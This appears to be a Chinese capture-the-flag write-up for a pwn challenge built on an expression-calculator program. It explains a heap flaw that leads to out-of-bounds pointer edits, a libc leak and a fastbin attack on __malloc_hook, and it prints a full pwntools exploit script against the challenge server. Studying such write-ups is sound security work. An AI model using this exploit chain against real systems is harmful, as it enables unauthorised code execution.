-
-
[分享]第六题 兵刃相向 wp
-
2020-11-29 22:08 4363
-
第六题 兵刃相向 wp
思路
一个中序表达式转后序表达式计算的程序,parse_infix_expression函数和process_infix_token函数检查都比较严格,因此可以把攻击点着重放在evaluate_postfix_expression函数中。程序在取堆块的时候并没有将原有的堆块的数据置零,可以申请AB两个堆块,B堆块的name设置为运算符,将AB两堆块合并,再取出稍大的堆块,让postfix与B堆块的name对接,使得运算符比操作数要多。
运算符多了,就可以通过这段代码对g_ctx.g_symbol_ptrs进行越界访问了。向上越界对g_ctx.g_symbol_ptrs里的堆块地址做增减运算,可以完成很多事了。
既然可以改变g_ctx.g_symbol_ptrs中的堆块地址,那pval就是可控的了。利用pval写入乘法运算符,之后利用乘法运算符越界将g_ctx.g_broken置零,泄露bin的地址,构造fastbin attack向malloc_hook写入one_gadget就可以得到shell了。
脚本写的很垃圾,有很大的优化空间。不过做出来就行了,也懒得改了。
exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 | from pwn import * context.log_level = "debug" local = False if local: p = process( "./ee" ) libc = ELF( "/lib/x86_64-linux-gnu/libc.so.6" ) one_gadget = 0xf0364 smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000 else : p = remote( "121.36.145.157" , "10000" ) libc = ELF( "./x64_libc.so.6" ) one_gadget = 0xf02a4 smallbin_offset = 104 + 0x3C4B20 def Gdb(): gdb.attach(p, "b *0x555555554000+0x22C3\ndirectory ./srcs/\n" ) #0x1bb7 def create(name, express): p.sendlineafter( ": " , str ( 1 )) p.sendafter( ": " , name) p.sendafter( ": " , express) def show(name): p.sendlineafter( ": " , str ( 4 )) p.sendafter( ": " , name) def delete(name): p.sendlineafter( ": " , str ( 2 )) p.sendafter( ": " , name) def revalute(name): p.sendlineafter( ": " , str ( 3 )) p.sendafter( ": " , name) def getSize(size): return (size + 27 + 0x10 ) create( "aaa\n" ,( "00000000000000*" * 6 )[: - 1 ]) #0 used create( "-" * 2 ,( "00000000000000*" * 6 )[: - 1 ]) #1 used create( "ccc\n" ,( "00000000000000*" * 6 )[: - 1 ]) #2 used delete( "aaa\n" ) #0 free delete( "-" * 2 ) #1 free create( "aaa\n" ,( "00000000001-" + "000000000000-" * 7 )[: - 1 ] + "00" ) #0 used length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM" for i in range ( 21 - 3 ): create(length[i] * 2 , "1+1" ) create( "*" * 18 , "10000 * 347063282342678 + 7882" ) revalute( "aaa\n" ) revalute( "\n" ) for i in range ( 26 ): revalute( "aaa\n" ) for i in range ( 21 - 3 ): delete(length[i] * 2 ) revalute( "\n" ) create( "aaa\n" ,( "00000000000000*" * 6 )[: - 1 ]) #0 used create( "-" * 2 ,( "00000000000000*" * 6 )[: - 1 ]) #1 used create( "ccc\n" ,( "00000000000000*" * 6 )[: - 1 ]) #2 used delete( "aaa\n" ) #0 free delete( "-" * 2 ) #1 free create( "aaa\n" ,( "00000000001-" + "000000000000-" * 7 )[: - 1 ] + "00" ) #create("zzz\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") #fastbin attack #create("uuu\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") #create("kkk\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") offset = ( 0x00005555557584a5 - 0x5555557580fd ) for i in range (offset): revalute( "aaa\n" ) show( "1 +00000000!\n" ) p.recvuntil( "[*]value : " ) smallbin = int (p.recvline()[: - 1 ]) #Gdb() log.success( "smallbin ==> " + hex (smallbin)) libc.address = smallbin - smallbin_offset offset = ( 0x5555557580fd - 0x5555557580b0 ) for i in range (offset): revalute( "aaa\n" ) delete( "\n" ) for i in range ( 21 - 6 ): create(length[i] * 2 , "1+1" ) create( "zzz\n" ,( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) #fastbin attack create( "uuu\n" ,( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) create( "kkk\n" ,( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) create( "ttt\n" ,( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) offset = ( 0x0000555555758730 - 0x00005555557586c0 ) for i in range (offset): revalute( "aaa\n" ) delete( "kkk\n" ) delete( "uuu\n" ) delete( "\n" ) #Gdb() delete( "aaa\n" ) delete( "qq\n" ) delete( "rr\n" ) delete( "uu\n" ) create(p64(libc.sym[ '__malloc_hook' ] - 0x23 ),( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) create( "deadC0de1" ,( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) create( "deadC0de2" ,( "00000000008-" + "0000000000-" * 4 )[: - 1 ] + "00" ) one_gadget = libc.address + one_gadget one_gadget = one_gadget / 4 create( "a" * 0x12 , "{0} * 4 {1}" . format (one_gadget, "-00000000" * 4 )) #Gdb() create( "getshell" , "1-1" ) p.interactive() |
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
赞赏
看原图